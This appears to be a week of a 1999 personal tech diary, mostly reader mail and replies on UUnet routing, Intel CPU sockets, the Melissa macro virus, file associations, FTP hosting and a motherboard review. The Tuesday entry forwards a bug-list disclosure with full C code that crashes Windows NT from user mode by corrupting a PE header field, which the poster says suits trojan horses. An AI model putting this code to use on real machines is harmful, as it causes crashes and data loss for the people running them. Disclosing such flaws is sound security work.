Week of 4/5/99

[Apr 3, 1999, 6:08 pm] UUnet routing
We have confirmed that there are problems in UUnet's local routing mesh, and that their network engineers are working now to correct it. This affects a small number of networks and ISPs whose route to us is unavailable. However, the problem seems to be not very widespread, and only affecting a handfull of ISPs at this time. We will post more details as they become available.

Anyone who is unable to reach us via web or telnet is encouraged to send traceroute results to urgent@pair.com demonstrating their problems. While we are unable to correct this ourselves, this information may be usefull in our contacts with UUnet in resolving this issue.

Over the last several days, I have received messages from Bruce Denman, Bo Leuf, and others reporting slow response or inability to get to this web site. If you have been experiencing problems getting to this site, please do a tracert and send the results to the address given above.

* * * * *

The Register ran a report yesterday that stated that Intel was abandoning the Slot 1 platform in favor of Socket 370. I find that hard to believe. I can easily believe that they'll abandon Slot 1 for the Celeron line, but I expect them to continue Slot 1 for their high-end stuff. I'll believe they're abandoning Slot 1 entirely when I see Intel announce Socket 370 multi-processor motherboards and PPGA Xeons. Until then, I think reports of the demise of Slot 1 are greatly exaggerated.

* * * * *

This from Bruce Denman:

Greetings again. Glad all seems well at your end but as of right now (Sunday, bout 1:40pm EDT) I cannot get to your site (or Toms or Pair). Also had similar problem late yesterday afternoon/evening. Tracert just times out as before. I did a bit of searching using dogpile; finally ended up at www.alter.net (duh) where one gets uunet; so; appears one and same.

I got that reference to MSIE 5 from my win 98 listserv. Anyway, I downloaded the change; installed it and now have it running. I see no obvious difference (version numbers changed). My d/l was 12MB supposedly but went quick. Others reported it faster too. Got me. Anyway; whatever it changed is a mystery (my guess..minor bug fixes). Did not show up on Windows update either.

Last, hope your having fun with taxes....<g>

Later

bruce
bdenman@ftc-i.net
http://web.infoave.net/~bdenman

According to pair Networks, UUNet (AlterNet) is having some routing problems that are making users of some ISPs unable to get to pair Networks sites. I've been able to get to my site with no problems since those I reported several days ago. I forwarded the screen shot you did of the tracert on to pair Networks, so we can hope they press UUNet to get things fixed.

As far as IE5, I still haven't attempted to download the updated version. I suspect the reason your download seemed so fast was that IE5setup lies about how much it will download. I found this out myself when I decided a week or so ago to download the "official" Microsoft version to replace the C/Net distribution files on my disk. I configured all the checkboxes to download the modules I wanted, and told it to start the download. It reported that it needed to download 19 MB. I clicked OK, expecting to be downloading for several hours. Instead, the download status bar moved quickly to the right and IE reported that I had downloaded the update at the rate of 867 KB/s. Only with Microsoft software can you get Ethernet-like throughput on a dial-up line. Obviously, it had noticed that many of files were already present on my drive, and had simply downloaded a few small files.

* * * * *

This from Bo Leuf:

It’s a passing bother, the junk email. I still use Pegasus for some regular mail, so I generally check the headers on the server first and delete the spam before deciding which mail goes where, i.e. Pegasus or Outlook pickup. Mail is still much of a batch-proposition when using a POST dial- up ISP, so the extra header check is a minor detail.

Melissa does otherwise nicely point out the risks of MS-monoculture software, especially when such glaring security issues are created by the way the software is designed.

/ Bo

--

"Bo Leuf" bo@leuf.com
Leuf fc3 Consultancy
http://www.leuf.com/

I've noticed a slight increase in my own junk mail lately. Interestingly, I get essentially zero junk mail addressed to some of my very public accounts, such as webmaster@ttgnet.com. I assume that junk mail address parsers are smart enough to realize that such addresses are not worth mailing to.

As far as Melissa, I had the same thoughts. Interesting how software parallels life. Many people are concerned about monoculture in agriculture for similar reasons. Everyone now grows the same wheat and the same pigs. In the past, a disease that affected one or another variant of a crop would have limited effect because other variants would be resistant. Nowadays, if a virus arises that affects wheat, it's going to affect essentially the entire crop.

* * * * *

The following three messages are all from joshua [catpro@catpro.dragonfire.net]:

One thing that I have been contemplating for my personal web site (which can be managed almost completely from nothing but a web browser) is adding an option so all my writing get emails to my readers, instead of them checking my site constantly for what is really only sporadic writing.

Anyway, you site isn't sporadic. But, I find that I don't really like taking the time to wait for the handful of web sites that I check routinely to load in my browser. So, borrowing a concept from a company that I worked for that maintains to intranet servers, one that holds the actual content, and one that contains the devel stuff, and other info of interest to IS, I started working to split my current home web development system into two. One part is my same old development system, but the other part is my homebrew subscription system (it's written in perl). It doesn't do much fancy parsing or anything like that (this is were XML will really be great, for developing custom content instead of trying to write a new parser for each web site). It just downloads the page, and puts a link to it off my main web page. So every night at 3 AM, my linux server dials out to the internet, collects any new email, sorts it out by mailing list, syncs my home news server with the net, and downloads some of my favorite web pages. Soon, it will parse them, and just present the relevant bits all in one page.

Anyway, the point of this long and drawn out (but I hope interesting) email, is that maybe your readers would like to have updates emailed to them automatically (if this is something you can implement with out too much trouble).

--

Joshua Boyd
http://catpro.dragonfire.net/joshua

At one point, I thought about doing email subscriptions, but that would just be one more thing to do in a schedule that's already full and overfull. Yours is actually the first message I've ever gotten suggesting that, however. If there's a substantial amount of interest in the idea, I may reconsider it. For the time being, however, I just can't do much more.

* * * * *

Sorry to email you again just 1 min later but...

You talked on 3/25 about how much easier it is to modify the adapters than it is to modify the Celeron chip, like was needed for Slot 1 Celerons.

Well, there is an even easier method. www.computernerd.com has custom made adapters with SMP already enabled.

One friend was talking about ordering a $2000 P3 system to run NT, since he couldn't build one for much cheaper. While he probably could have I didn't dispute that. Instead, I walked over to a computer on the web, and stepped him through building a SMP celeron system with more ram, Ultra SCSI drives and dual 19" monitors for less. While dual monitors wouldn't help the guy much, it really drove the point home to him. And despite your views on SCSI, it just feels faster than even Ultra DMA. Even my mother noticed the difference without being told what it was. She uses a p90 with 48megs of ram and a 4gig ultra scsi drive hooked up to and Adaptec 2940 (I know, the card is only Fast SCSI 2).

--

Joshua Boyd
http://catpro.dragonfire.net/joshua

How interesting. I am always a little concerned by sites with a lot of spelling errors ("SMI-6905" rather than "MSI" and "GPA" rather than "PGA"), but this is indeed an easy way to a dual Celeron system for those who are uncomfortable making the modifications themselves. I note that the site mentions that improved slockets should be showing up in the next few weeks that will be jumper-settable for single/dual operation and core voltage. I must say, though, that $25 for an unmodified (single CPU) slocket seems a bit pricey, as does $35 for the modified version. I mean, these things can't cost more than a couple of bucks to manufacture. A lot of motherboard manufacturers are throwing one in the box with every new motherboard. I notice that this company also provides full dual-Celeron systems, including ones built around the excellent EPoX motherboards.

* * * * *

I really should have just kept one message open to send everything at once. Sigh. Anyway, this time I talk about WordBASIC.

Mostly this is in response to Dave Farquhar on 3/29.

I disagree that the person who thought that Word should have something as powerful as WordBASIC should be keelhauled. For starters, WordBASIC has been merged into the whole Visual Basic for Applications (VBA) thing, so this isn't really a WordBASIC virus. I got my start as a professional programmer working in the Excel and VBA. I wrote a script that helped manage a large payroll system in Excel. I've also written scripts that do merges between excel and word so that they could store excel tables in a database application that hooks onto work, but doesn't like excel. In Access I wrote scripts that call dlls so that Access can automatedly FTP files off the main frame, and before that to call the Common Dialog for opening files (Access isn't really meant to be importing large dataset, in this case 60 some megs, daily). And I've done stuff in Access that loads files out of Access into Word, and then triggers a Word script to format that data and push it into Publisher.

Anyway, the point is that there is a reason to have such power features there. On a corporate level they are completely appropriate. However, they should be disabled for home users (we really need an Office Personal package I think), and system admins aren't doing their jobs properly if they don't know how to fight things like this, because if it ain't Word, then it is going to be someone else.

I realized the potential long ago, and have be warning people for a long time to not open attachments that they weren't expecting. And I'm not the only one. This highlights another problem that people don't like to actually respond until an epidemic breaks out. IE4 is so riddled with security holes (but usually not such simple to exploit one) that I am just waiting for computers with IE4 to just start reformatting spontaneously.

On linux when a security hole is mentioned, it gets fixed quickly, usually before it gets exploited (but not always). This is one of the major benefits of Open Source. There is no where to hide your problems, so there is no reason to try and cover them up. Besides if you do try to hide them, then someone else will just release a patch, and possibly rip control of the project from you (since who controls the project is a matter of trust, not just who started it).

Anyway, just food for thought.

--

Joshua Boyd
http://catpro.dragonfire.net/joshua

Good points. In particular, I wish Microsoft would listen to your suggestion that such things as WordBASIC be disable-able. Better still, I should have the option at install time as to whether or not to install such functions. So long as it's there, it's going to be a problem. And not just novices get bitten.

Pournelle and I have both taken a great deal of abuse from people for allowing ourselves to be victimized by Melissa. The messages usually start out something like, "How could you be so stupid?" Well, Pournelle's not stupid, and neither am I. Each of us has more than 20 years' experience with computers, and each of us is fully aware of the dangers of macro viruses.

Jerry got the Melissa message from someone he knew and trusted. It was from a PR agency, and PR agencies commonly use all sorts of bells and whistles to promote their products. He figured the document used macros for that purpose. I got the message from Pournelle. Again, we exchange Word documents frequently, and it's not uncommon for him to send me a copy of a column he just finished, with a note saying "please don't show this to anyone else." So I didn't think much about the message, although the macro warning gave me a moment's pause.

Those who think that only stupid or ignorant people are at risk of macro virus infections are missing the point. Certainly, stupidity and ignorance help these things spread, but at root Melissa depended on abusing trust. Jerry trusted the PR agency. He had no reason not to. I trusted Jerry. I had no reason not to. And I'll continue to trust Jerry, although I will admit that the next time I get a macro warning from Word I'll open the document first with macros disabled.

Statistically, like any husband, I'm at greatest risk of being murdered by my own wife. We have guns all over the place here. All of them loaded, and many of them cocked and locked. I suppose if I considered the statistics, I'd wear my Second Chance Z9 bullet-proof vest around the house and sleep alone in a locked room. But I don't, because I trust my wife. I'm not a particularly trusting person in general, but if you can't trust your family and friends, who can you trust? Melissa took advantage of that trust by spoofing mail from someone I had cause to trust. That was the truly evil thing about it.

* * * * *

This from Gary M. Berg [Gary_Berg@ibm.net]:

One thing to consider is how much of the Word user interface stuff is written in VBA. Obviously all of the document templates use macros, but I'd suspect that a significant portion of Word is actually implemented with VBA.

One thing that MS _could_ do is to have an option to automatically load documents with macros disabled. So that a user could set this once and then never have to worry about deciding when prompted to enable/disable macros. They would have to execute a command to enable the macros.

The other thing that MS could do is that when I have the MS Word viewer installed when I load Word97/Office 97 is to not disable it, but instead ask me if I want to use the Word viewer as the default document viewer. This would use the viewer when I double-click on an attached document in mail. Perhaps this should be an option at install time. I tried to do this, but the Office 97 install overwrote the Word (and Excel and PowerPoint) viewer parameters in the registry.

I confess that I never considered that WordBASIC/VBA was anything but a sophisticated and powerful scripting add-on for Microsoft applications. If you're correct that it's an intrinsic part of Word and other MS apps, that does make the problem more challenging. Some might go so far as to call it a design flaw.

Your point about permanently disabling macros is a good one. In other Microsoft products, one is often given the option to enable, disable, or prompt. With Word, Microsoft gives us the enable and prompt options, but no disable option. And your point about being able to specify a default viewer is also an excellent one.

This whole idea of associating filename extensions with applications is long obsolete. There's absolutely no reason to continue to depend on this kludge. The source application for each document could be identified either by filesystem tracking (for locally created documents) and/or by an embedded flag in the document itself. When the OS does a file open, it could determine which application to load that document with by prioritizing, (1) filesystem source application data, if present, (2) embedded flag, (3) extension, and (4) prompt user for application. It'd also be nice if Microsoft applications gave you an "Open With..." choice on the context-sensitive menu without having to do a Shift before the right click.

* * * * *

I notice that I used the word "sophisticated". It's interesting how usage over the years allows words to change meanings, sometimes to the extent that they become nearly opposite in meaning to the original usage. Nowadays, sophisticated has a positive meaning. Originally, sophisticated was a synonym for adulterated. Similarly, the word "cute" has come to mean attractive, where originally it was a synonym for bowlegged.

Tuesday

Tuesday, April 6, 1999

Lots of interesting mail today, which is fortunate because I'm too tired to invent anything interesting to write about.

* * * * *

My friend Paul Robichaux forwarded this message from a mailing list he subscribes to. What's disturbing about this is that it can be run without special privileges in user mode (versus kernel mode). You're not supposed to be able to do something like this in user mode, and certainly not as a non-privileged user. It looks like Microsoft needs to go back to the drawing board on this one:

This is fun.

Approved-By: Russ.Cooper@RC.ON.CA
X-Sender: "Jussi Lahdenniemi" jlahd@vvf.fi
X-SLUIDL: DB728B9E-E54E11D2-80FF0090-27093B8F
Date: Wed, 31 Mar 1999 12:56:57 +0300
Reply-To: Jussi Lahdenniemi jl@VVF.FI
Sender: Windows NT BugTraq Mailing List NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
From: Jussi Lahdenniemi jl@VVF.FI
Subject: BSOD in user mode
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Hello,

the following program causes NT kernel to bugcheck. It does not need any special privileges and can be hidden easily. Mainly usable in trojan horses, probably.

Anyhow, the NT's PE loader seems to crash when the Load Configuration Directory pointer in the executable header is illegal. Tested with NT4/SP4 and NT5 beta 2. Windows 95 and 98 do not mind.

#define WIN32_LEAN_AND_MEAN
#define STRICT
#include <windows.h>
void main( void )
{
char me[MAX_PATH], tpath[MAX_PATH], tname[MAX_PATH];
HANDLE h;
DWORD x, foo;
STARTUPINFO sui;
PROCESS_INFORMATION pi;
if( MessageBox( NULL, "Do you want to crash your NT?", "Crash it?",
MB_ICONQUESTION | MB_YESNOCANCEL ) != IDYES )
{
return;
}
GetModuleFileName( NULL, me, 256 );
GetTempPath( 256, tpath );
GetTempFileName( tpath, "foo", 0, tname );
CopyFile( me, tname, FALSE );
h = CreateFile( tname, GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING, 0, NULL );
SetFilePointer( h, 0x3c, NULL, FILE_BEGIN );
ReadFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
SetFilePointer( h, x + 0xc8, NULL, FILE_BEGIN );
x = 0xba6defdd;
WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
WriteFile( h, (void*)&x, sizeof( DWORD ), &foo, NULL );
CloseHandle( h );
GetStartupInfo( &sui );
CreateProcess( NULL, tname, NULL, NULL, FALSE, 0, NULL,
NULL, &sui, &pi );
}

--

Jussi Lahdenniemi, Virtual Visions Finland jl@vvf.fi
Hermiankatu 6-8C tel +358-50-3591405
33720 Tampere fax +358-3-3186100
Finland

--

Paul Robichaux | paul@robichaux.net | http://www.robichaux.net
Robichaux & Associates: programming, writing, teaching, consulting

* * * * *

This from MITCHELL ARMISTEAD [mhaathome@worldnet.att.net]:

A quick thought,

A macro virus has to execute.

The macro has to execute automatically, to prevent the User from stopping it.

Word, and other Office products, automatically execute a Macro with a certain name (AutoExec, Auto_Open, AutoNew, etc.)..

Macros have a valid function, in that they allow each user to modify the program to their particular needs. From the automation of tasks, to custom mini-applications. The problem is the "automatically" ability.

Wouldn't the solution here be to allow each user to specify the name of the macro to execute automatically. A document could have any number of attached macros, only they would never run. You would just have to avoid a default.

Mitch Armistead
mhaathome@worldnet.att.net

Yes, that's certainly another macro feature that Microsoft should provide. I'd still like the ability to disable macros entirely, however.

* * * * *

This from Chuck Waggoner [waggoner@gis.net]:

Your virus discussion is intriguing, although it deals mostly with Word. During the middle of last week, I got hit--by what, I don't know,--but I think it came in through IE4.

I never use the desktop; I only see it during my daily reboot of Win98 (which will only run about 48 hours without going berserk). Strangely, on Thursday, a half-screen picture of a toilet appeared as a background tile. Obviously this was a prank, but very disturbing. I did not have tiles activated, so whatever this was, could get into my background setups and make changes.

I visit a limited number of sites, and was much too busy doing my Schedule C to do any surfing last week. Which makes Joshua Boyd's comment about IE initiating a disk format all the scarier.

Nevertheless, I can't agree with the general opinions expressed that certain elements of programs should be disabled because some small minority might use them to cause trouble. In my opinion, that represents discrimination against a large majority of users, regardless of their expertise, who have no motivation or intention of causing mischief. To me, it's not much different than those who advocate gun control--yes, people are killed by guns everyday, but those who are serious about committing a crime, are going to get hold of a gun one way or another. When I lived in Chicago working in the media during the '80s, the pro-gun lobby there, had the happy fortune of being able to demonstrate that nearly all crimes with guns in which the criminal was caught, involved the use of stolen or illegally obtained guns.

It also bears some relation to the actions of our city's mayor, who, when two years ago, was faced with a park bench which had the seat slats smashed near our city's downtown pond, related afterward that the bench will never be repaired as long as he is the mayor. Good idea: punish residents of the entire city, for actions of what was probably one or two ingrates.

Punishing the masses of computer users by a determination that they have no business employing certain features and therefore should not even have access, does not sound like liberty. In fact, denying feature access, and especially making large groups suffer for crimes of the few, sounds to me more like an invitation to vigilantism.

Well, that's a truly frightening experience. It used to be that, in a fundamental sense, we could know what our computers were doing. That's no longer the case, and hasn't been for years. I remember the first time I loaded Xenix on a Compaq PC in 1986. I was sitting next to the PC doing something else when the drive started clattering and the access light flickered. The thought struck me then that I had no idea what my computer was doing at that moment, and it disturbed me. Nowadays, I have no idea what my computer is doing most of the time. That's not good, I suppose. We've traded a lot for a GUI and convenience. Now we're getting to the point where the PC can do dangerous things without our being aware, let alone giving our permission.

As far as the disabling issue, unless I've misread what's been said, I don't think anyone was suggesting that macro capabilities be eliminated from products. Just that what they do, how they do it, and when they do it be under the complete control of the owner of the PC. I'd like the option to choose whether or not I want to install macro features. I don't use them, at least not directly, and it'd be nice to have the choice of not having them there cluttering things up. If you use them, you should certainly have the option to install them. In a corporate environment, whether or not to disable those features might be a matter of policy. For individuals, I think it's a pretty generally accepted principle that safety should take precedence over convenience or available features, so shipping such products with macro features disabled might be a good idea. The manufacturers could always mention what they'd done in case a user wanted to turn those features back on.

As far as the gun control analogy, you'll never encounter anyone who's more pro-gun than I am. As I read it, the Second Amendment guarantees even convicted felons the right to keep and bear nuclear weapons. But I'm not sure how making macros disableable relates to the Right to Keep and Bear Arms.

* * * * *

This from Bo Leuf [bo@leuf.net]:

Spotted this in the evening’s news. Traditional rights eroding further?

>>>

A divided U.S. Supreme Court Monday gave police broad new powers to search a passenger's personal belongings inside a car suspected of containing contraband.

The high court, by a 6-3 vote, ruled that officers may inspect a passenger's purse, briefcase or other personal items if they have sufficient grounds to search the car.

Continuing a trend in recent years by the court's conservative majority to expand police powers to search and seize evidence, Justice Antonin Scalia said in the ruling the passenger's constitutional privacy rights were not violated.

In the car search case, Scalia said ``passengers, no less than drivers, possess a reduced expectation of privacy with regard to the property that they transport in cars.''

…

He said the constitutional right against unreasonable searches would not bar the search and a court warrant would not be needed as long as the police had sufficient reason to believe the car contained illegal contraband.

``Effective law enforcement would be appreciably impaired without the ability to search a passenger's personal belongings when there is reason to believe contraband or evidence of criminal wrongdoing is hidden in the car,'' he said.”

<<<

Yeah, I'd call that an erosion. Warrantless searches of any sort are prima facie unconstitutional, viz.

"The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized. "

The problem, of course, is that the Supremes "interpret" things that don't need to be interpreted. The latest attempt to get around constitutional safeguards is their interpretation of "unreasonable." In a literal sense, as it was intended, "unreasonable" means "without reason", i.e. without evidence that a crime has occurred. Now they're attempting to redefine a cop's suspicion as being grounds for a "reasonable" search. That, of course, eliminates the safeguard entirely, since any cop can suspect anyone of anything at any time. Exactly the situation the Fourth Amendment was intended to protect us against.

* * * * *

This from Gary M. Berg [Gary_Berg@ibm.net]:

>> If you're correct that it's [VBA] an intrinsic part of Word and other MS apps, that does make the problem more challenging. Some might go so far as to call it a design flaw. <<

A friend of mine who was a Word beta tester said he once did something which basically killed off the whole VBA subsystem by screwing up an add-in. Lots of stuff failed to work after that. I would expect that a lot of the user-friendly stuff (wizards and such) might be implemented in VBA so as to stay away from the core code.

>> This whole idea of associating filename extensions with applications is long obsolete. <<

There should be some sort of application ID stored in the file or in the OS filesystem. This is similar to what the Mac uses? I don't know how to assign it, or how to override what viewer application should look at it by default instead of the actual creating application (to keep macros out of our systems).

I can believe that a lot of the bells and whistles in Word and other Microsoft apps use VB, but I suspect I'd be happy to do without most of them. As far as the Mac, I don't know much about it, but I believe it stores files as two forks. The data fork contains the actual data, and the resource fork contains, among other things, information about the application that created the file.

* * * * *

This from joshua [catpro@catpro.dragonfire.net]:

$25 may be rather pricy for an unmodified adapter. Is so, then just buy unmodified ones somewhere else. As for $35 being pricy for modified ones, well, even though modifying an adapter is easier than modifying the chip, I still am not sure that I would want to trust my own work. Thus for me it is pay $35 for a premade adapter, or $1000 for dual P2s. At least until another company starts selling premodified ones for less. Early this summer, I plan to build myself a new system, and unless someone else starts making cheaper adapters already modified, I think it is saving me money to just cough up the cash for the premade ones, and spend the time working that I would have spent modifying the adapters.

--

Joshua Boyd
http://catpro.dragonfire.net/joshua

Since you won't be building your system until this summer, you'll be able to use one of the jumper-settable slockets that MSI and others plan to release shortly. As a matter of fact, the web site we're talking about mentions that these new slockets will be available in a few weeks, and offers to credit most of the price you pay for a current model on the new model.

* * * * *

This from Louis Cissell [cissell@mediaone.net]:

I’ve been visiting your sight for several months now - count me as another bounce from Chaos Manor and someone who thoroughly enjoys your no-nonsense and information rich style.

I am responsible for two separate networks, one at my wife’s business with 7 PCs on a win98/3.11 network and another at the print shop where I work. This one consists of an NT 4 server 5 PCs and 3 Macs. My “training” is strictly OJT trial and error but so far everything seems to work OK.

I have a question concerning internet hosting and IP numbers. My wife needs to set up an ftp server fairly soon strictly for private use of her customers, does this require a domain name or just a static IP address.
Pacific Bell will soon be offering DSL in her area (3miles from Los Angeles International Airport) and is has a -Small Business Package- Dedicated Product - Digital Subscriber Line -of DSL service with 32 static IP addresses for around $200-$300 a month and hosting is allowed over this service. Can we just set up an ftp server on one IP address or do we need some kind of “official blessing” to do something like this.

I’ve spent several hours trying to find relevant info on the net and have found little, so I thought I’d ask someone who might know.

Thanks for any enlightenment.

Louis Cissell
cissell@mediaone.net

P.S. - I love my cable modem.

Thanks for the kind words. To answer the question you asked, you don't need a domain name to bring up an ftp server. What a domain name buys you is that users can access the site by name (e.g. ftp.acmebuggywhips.com) rather than just by IP address. So, if you don't mind people having to enter the IP address in their ftp clients, a domain name is unnecessary. You can simply install and configure an ftp server on a static IP address, populate your ftp directory and let 'er rip. And now to answer some questions you didn't ask:

Do you really want to run your own ftp server? There can be good reasons for doing so. For example, the files you serve may be confidential and you may need to keep them under tight control. But if that's not the case, you might be better off signing up with a hosting company. For anything from $5 to $25 per month, you can get your ftp site hosted (and your web site, for that matter) by a company that specializes in doing this. If that $200 to $300 is significantly more than you'd pay for an ADSL link with a single static IP address (or even one with a dynamic IP address), you may want to reconsider whether you want to pay the extra money to run local servers. For that matter, one static IP address is all you need to run local servers, so there's no point in paying for 32 static addresses if the service with just one static IP address is cheaper.

If you decide to run a local ftp server, what are you going to run it on? Although I'm sure there are ftp server packages available for Win9x, that's probably not what you want to do. Realistically, the best choice would be a Linux or BSD box, and next-best would be a Windows NT Server box. Setting up and managing an ftp server is not particularly difficult, but you will need the operating system, software, and someone who has the knowledge (or the time to develop it) to administer the site.

Are you prepared to secure your site? If you run a local ftp server with a full-time Internet connection, you'd better be sure you have things locked down tight. Otherwise, don't be surprised to find that an intruder has hacked into your network. Actually, it's not the ftp server that's the important part. One of the aspects of full-time Internet connections that's been widely ignored is the security threat they pose. A couple of years ago, only corporations were at risk from this, but nowadays anyone with a cable modem or ADSL link at home is also at risk.

* * * * *

This from joshua [catpro@catpro.dragonfire.net], responding to several other threads:

Statistically, like any husband, I'm at greatest risk of being murdered by my own wife. We have guns all over the place here. All of them loaded, and many of them cocked and locked. I suppose if I considered the statistics, I'd wear my Second Chance Z9 bullet-proof vest around the house and sleep alone in a locked room. But I don't, because I trust my wife. I'm not a particularly trusting person in general, but if you can't trust your family and friends, who can you trust? Melissa took advantage of that trust by spoofing mail from someone I had cause to trust. That was the truly evil thing about it.

And yet you don't know whether it is really Pournelle or not on the other end of the email, where as you do know your wife when she calls. But what if it was a telegram from her? How would you be sure than? Preventing things like this is one of the goals behind public key encryption and signature systems like PGP. A program like Melissa may be able to send you email from Pournelle, but it can't properly sign it for him. Just like someone can send you a telegram pretending to be your wife, but it is pretty darn hard to do a good job signing her signatures.

In responce to your comments on Gary M. Bergs letter, yes, Word does use VBA extensively itself. The whole menu system uses VBA, which is why it is so easy to customize it. All menu ideas are just records in a database that tell it what macro to call. Sometimes that macros are just a call to a built in function, and sometimes they are more. Also, templates use VBA. I wouldn't call it a design flaw, anymore than I would call the fact that emacs is extensively written in it's built in lisp is a flaw. It is just an extremely powerfull way of doing things, and one that needs better control, like options to run code in templates, but not normal Word files or incoming email. Those are options that emacs offers for security so that people can sneak a lisp virus into email being red by emacs.

In regards to using file xtensions to decide which application to use. I can think of only two operating systems that don't work that way, MacOS, and BeOS. MacOS embeds a 4 letter tag into the document that it uses to decide what to use to open the file. If you think about it though, it isn't much different from having a 4 digit extension, except you can't see it, and it is a pain to change. Worse, the same file type's tag is set by the program that creates it. So if I write out a jpg from photoshop, photoshop is always going to be the program that is run when I double click on the icon, even if I usually want to image to be loaded into a catalog program instead.

BeOSs system is slightly more advanced, thanks to their object oriented file system. It still relies on file extensions most of the time, but it doesn't have to. A program can create a file type to have data stored with it in addition to it's main data area. This is how the address book system works. Each person in it actually has their own file in the proper folder, and any program can examine this data. I beleive that BeOSs file system has much potential, but currently, BeOS is even less ready for end users than linux in many ways (although it is easy to get it working in the first place). I'm a registered developer for Be, but I have to admit that I like linux better. When ever I use BeOS I feel I am being nickled and dimed because you have to pay for every single program just about, to an extent even worse that MS land. Further, I'm finding that I don't like closed source system libraries, because I like to be able to browse through the source code to see how things are supposed to relate to each other when I am have problems. Their documentation just doesn't provide the same clear view that browsing through the code for those libraries would.

Using file extension to determin type isn't really a bad idea, if all data can be read by all applications, and on unix systems, that is frequently the case. My word processor (emacs to write text, latex, and html files, depending on the level of formating needed for the doc) produces files that can be parsed out by most other programs. My spreadsheet (siag, which uses the scheme programming language for cell calculations, and can store in a slew of text formats) also uses a text system. Obviously my source code is all text. The major exception is picture data.

Universally read files was supposed to become a reality with XML (and before that with SGML, but SGML was just too difficult). Office 2000 was supposed to write and use XML files (you are the one who has Office2K, I don't), and if a program had trouble with a set of XML tags, it could call on another library through CORBA or OLE (depending on platform) to help it, or it could just ignore that section. Thus databases, word processor documents, Illustator drawings, spreadsheats, accounting systems, tax systems, and PIM softare all use the same extension, .xml.

--

Joshua Boyd
http://catpro.dragonfire.net/joshua

Good points, all. One thing, though. PK encryption/signing wouldn't necessarily have helped with Melissa. Because it took control of Pournelle's copy of Outlook, it could easily have signed the outbound mail with his signature unless, like PGP, the encryption software doesn't store the private key but requires the user to enter it manually. And actually I don't have Office 2000. I'm not sure I'll upgrade to it, either.

* * * * *

This from Jan Swijsen of The Netherlands, who asks that his address not be posted:

I'll believe they're abandoning Slot 1 entirely when I see Intel announce Socket 370 multi-processor motherboards and PPGA Xeons. Until then, I think reports of the demise of Slot 1 are greatly exaggerated.

I think this does looks logical, from an Intel point of view. With the new trend of putting L1 cache on the processor die itself the advantage of a slot over a socket is mute for relative low end products. For the real high end stuff they have Slot-2 ready (Xeon on SC330) and for the 'low' end they have the Socket 370. Both of these are proprietary. Read no AMD and no Cyrix. .

Slot-1 is, via strange licensing paths, available to Cyrix and the Jalapeno is supposed to become available in Slot-1 format. AMD has a 'Slot-1'like technology, Alpha EV6 buss licensed from Digital who developed it for their Alpha, available and ready to roll. This is physically the same as the Intel Slot-1 and could be supported on a mother board with suitable chip set. Maybe via a BIOS switch selecting between Intel Slot-1 and Alpha EV6.

Intel has the competition wrong footed, again, so now is the ideal time to drop a standard and put in a new one.

We will see multi processor boards using Socket370 soon enough, if not from Intel. What I am wondering is how long it will take before we see Slot-1 modules with two Socket370 or Socket7 chips. It must be possible to do and it would provide some serious power, especially for upgrade board. How many people would jump to upgrade a PII 266 with 2x 400Mhz Celerons or even 2x AMD K7 !!

ps I discovered your site through Jerry Pournelle. ( I also found Tom Syroid and Bo Leuf through his site. All four now have a place on my own home page!) I use the '11f' code that he requests for stuff that may (but doesn't have to) be posted.

Svenson

Good points. I actually got to thinking after I posted that remark that perhaps I should fix it before people asssumed that I thought Xeon CPUs fit Slot 1. Parenthetically, I notice that Intel no longer manufactures any Slot 1 or Slot 2 motherboards or processors. They now refer to them purely by the number of contacts, e.g. "the 242-contact connector (previously known as Slot 1)".

A dual slocket would indeed be an interesting device, although I'm not sure that it's theoretically possible for Intel processors. I understand that the K7 will support SMP via direct connect, so that might be doable, although it would be one whopper of a card.

Wednesday

Wednesday, April 7, 1999

We've finished preliminary testing and evaluation on the Intel BI440ZX system board. This miniscule (9.6" X 9.6") Micro-ATX system board is not intended for power users. It provides one AGP slot, two PCI slots, and one shared ISA/PCI slot. It uses the 440ZX/66 chipset, and provides no overclocking options. But none of that is really relevant, because this board is not designed to compete in the hobbyist/overclocking market.

For its intended purpose--the foundation of an inexpensive, top-quality Basic PC--this is a superb board. Its layout and construction quality are up to Intel's usual high standards. One sign of a top-notch motherboard is that the manufacturer sweats the small stuff. It's evident in every aspect of this board that Intel has done just that. Something as simple as the fact that they label each side of the board with co-ordinates to allow you to locate components much as you might locate a city on a road map by looking for square G7 indicates that Intel has thought things through fully for this board.

Although the board is tiny, it is solidly built and very well laid out, with everything readily accessible. The header pin front panel connectors, which appear on the front edge of the system board on most ATX boards, are located a couple of inches in from the front edge of this Micro-ATX board. Although this appeared strange at first, we found it actually made it easier to make connections. The CPU socket is well protected by five large capacitors and two ferrite inductors. We're used to the huge heatsinks used with the 440BX chipset, so we were surprised to see that the 440ZX/66 chipset has no heatsink and is simply a largish surface mount chip.

Although this is a small board, it contains a full complement of connectors. In addition to the standard IDE and floppy connectors, there are fan power headers for the CPU and system fans, ATAPI and legacy CD audio connectors, and (rather surprisingly) a Wake-on-LAN connector. The back panel includes two interchangeable mouse/keyboard PS/2 ports, two USB ports, an ECP/EPP printer port, a game port, the three standard audio ports (line in, line out, and mic), and, mirabile dictu, two 9-pin serial ports, so you can use both your external modem and your PalmPilot cradle without swapping cables. Intel sells this board in many configurations, some with fewer connectors and some with many more.

Installation is smooth, aided by automatic everything and a streamlined BIOS setup. As has become common industry practice, Intel includes only an overview pamphlet rather than full printed documentation, but the complete manual is available on the included CD-ROM. We did our preliminary testing with a PPGA Celeron/400, which was the only Socket 370 processor we had available. This made benchmark comparisons impossible, but the system definitely "felt" like a 400 MHz system. But benchmarks are of little significance on Intel-based systems nowadays. Socket 7 motherboards that use different chipsets often differ widely in performance. Even different Socket 7 motherboards that use the same chipset can perform very differently. But performance variations among boards that use Intel chipsets are minimal. Any competent 440BX-based board, for example, will likely benchmark within a few percent of any other BX-based board. Although we will be unable to benchmark the performance of a Slot 1 Celeron in a 440BX motherboard against the performance of a Socket 370 Celeron in this 440ZX/66 motherboard until we obtain at least one matching pair of Slot 1/Socket 370 Celeron CPUs, we expect any variations to be minor.

